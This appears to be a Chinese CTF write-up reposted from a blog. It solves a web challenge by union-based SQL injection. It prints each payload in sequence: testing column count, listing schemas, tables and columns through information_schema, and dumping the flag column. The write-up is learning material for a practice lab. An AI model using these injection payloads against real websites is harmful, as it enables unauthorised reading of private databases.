标签：shu   没有   mic   输入   ora   应该   span   from   nio   

web-1签到

web-6成绩单

这是一道很好的练习sql注入的题目，涉及注入代码的实现自己打一遍可以增强理解

打开题目链接是这个样子的。。

 输入1,2,3试一下，3就没有了

输入1：

 输入2：

 既然试不出来，那应该就是注入了，测试一下注入点

先试试?id=1‘ 查询不到页面，再试试联合注入 ?id=-1‘ union select 1,2,3#，不行，但是觉得应该是sql注入其他也不会了，继续试

尝试?id=-1‘ union select 1,2,3,4#

发现可以。有门，这里应该是注入点无疑了

1.查库：?id=-1‘ union select 1,group_concat(schema_name),3,4 from information_schema.schemata#

发现这个web1挺特别的，可能在这里面

2.查表web1

?id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="web1"#

欣喜若狂，已经接近答案了

 

3.查列：

?id=-1‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="fl4g"#

么毛病，最后一步了

 

4.查该列数据

?id=-1‘ union select 1,group_concat(flag),3,4 from web1.fl4g#

 

 就这样解出来了

flag{Sql_INJECT0N_4813drd8hz4}

 

本题部分思路来自https://www.jianshu.com/p/1a490e9b2823

T-star高校挑战赛部分wp

标签：shu   没有   mic   输入   ora   应该   span   from   nio   

原文地址：https://www.cnblogs.com/xmasker/p/13215261.html